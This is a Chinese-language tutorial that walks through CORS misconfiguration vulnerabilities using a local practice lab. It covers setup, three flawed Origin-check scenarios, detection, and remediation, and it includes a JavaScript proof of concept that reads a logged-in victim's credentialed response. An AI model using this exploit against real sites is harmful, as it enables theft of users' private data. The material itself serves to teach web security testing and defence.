0x01 漏洞简介
跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据,目前已经被绝大多数浏览器支持,并被主流网站广泛部署使用。跨域资源共享 CORS 漏洞主要是由于程序员配置不当,对于 Origin 源校验不严格,从而造成跨域问题,攻击者可以利用 CORS 错误配置漏洞,从恶意网站跨域读取受害网站的敏感信息。
这里只做简单介绍,关于 CORS 漏洞的详细分析可以点击查看这篇文章:CORS漏洞原理分析
0x02 漏洞环境
漏洞靶场 CORS-vulnerable-Lab 包含了与 CORS 配置错误相关的易受攻击代码。可以在本地虚机上部署易受攻击的代码,以实际利用 CORS 相关的错误配置问题。
- 项目地址:https://github.com/incredibleindishell/CORS-vulnerable-Lab
此项目代码需要满足以下配置环境,可利用 phpstudy 进行快速搭建。
- Apache web server
- PHP 5/7
- MySQL Database
安装步骤如下:
1)下载并解压项目源代到phpstudy的网站 www 目录下
2)创建一个MySQL数据库,名字叫 ica_lab ,并将项目源码 database 目录下的 ica_lab.sql 文件导入到该数据库中
3)在文本编辑器中打开 c0nnection.php ,并修改连接数据库配置信息
$conn = mysqli_connect("127.0.0.1","root","root","ica_lab");4)最后,访问靶场地址即可
该靶场内置了3个 CORS 的漏洞场景
- 场景一:信任任意 Origin 源
- 场景二:正则表达式检测 Origin 源
- 场景三:信任任意 null 源
0x03 漏洞检测
一般情况下,修改请求包 Header 中的 Origin 字段为任意域名或者为 null 的方式去检测该漏洞是否存在。
场景一:信任任意 Origin 源
应用程序接受来自任何 Origin 的 CORS 请求。该代码将 Origin 值放在 HTTP 响应头 Access-Control-Allow-Origin 中。现在,此配置将允许来自任何 Origin 的任何脚本向应用程序发出 CORS 请求。Web 浏览器将执行标准的 CORS 请求检查,来自恶意域的脚本将能够窃取数据。
应用程序接受 Origin 标头中指定的任何值。
场景二:正则表达式检测 Origin 源
应用程序已实施 CORS 策略并对列入白名单的域/子域执行“正则表达式”检查。在这种情况下,应用程序在代码中具有弱正则表达式实现,它只检查 HTTP 请求 Origin 标头中任何位置的域名 b0x.com 的存在。如果 HTTP 标头 Origin 的值为 inb0x.com 或 b0x.comlab.com,正则表达式会将其标记为通过。这种错误配置将导致跨源共享数据。
应用程序信任列入白名单的 Origin。
应用程序不允许任何任意来源。
应用程序弱正则表达式允许在域名开头具有白名单域字符串的 Origin。
应用程序弱正则表达式允许在域名末尾具有白名单域字符串的 Origin。
场景三:信任null源
在这种情况下,应用程序 HTTP 响应标头 Access-Control-Allow-Origin 始终设置为 null。当用户指定 null 以外的任何值时,应用程序不会处理它并在 HTTP 响应中继续反映 null 。允许攻击者执行漏洞利用的技巧很少,并且可以使用 CORS 请求过滤受害者的数据。
应用程序接受 Origin 标头中指定的 null 值。
注意事项
如果响应包 Header 中为以下情况 ,则不存在漏洞。
代码语言:javascript复制Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials:true
原因是因为浏览器会对此类情况的请求进行自动拦截,不具备漏洞利用条件。
0x04 漏洞利用
在 CORS-vulnerable-Lab 靶场的 POCs 目录下,有 CORS 漏洞利用的脚本
以 arbitrary_origin_exploit.html 为例,用文本编辑器打开该脚本文件,找到如下代码并根据实际应用场景进行修改
<script>
//向目标应用程序网页发出 CORS 请求以获取 HTTP 响应的函数
function exploit() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var all = this.responseText;
document.getElementById("load").innerHTML= all; // 分割打印被盗取的 HTTP 响应
}
};
xhttp.open("GET", "http://192.168.126.6/CORS/arbitrary_origin.php", true); //将 URL 更改为错误配置 CORS 策略的 URL
xhttp.setRequestHeader("Accept", "text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8");
xhttp.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhttp.withCredentials = true;
xhttp.send();
}
</script>将利用脚本放置在搭建的恶意网站下,当受害者在同一浏览器登录目标网站,并打开该恶意链接,即可盗取目标网站的 HTTP 响应内容。
0x05 漏洞修复
- 禁止配置 “Access-Control-Allow-Origin” 为 “*” 和 “null”;
- 严格校验 “Origin” 值,避免出现权限泄露;
- 避免使用 “Access-Control-Allow-Credentials:true”;
- 减少 “Access-Control-Allow-Methods” 所允许的方法;
参考文章
- https://www.bugbank.cn/live/view.html?id=111824
- https://blog.csdn.net/m0_38103658/article/details/102721402
- https://research.qianxin.com/archives/290
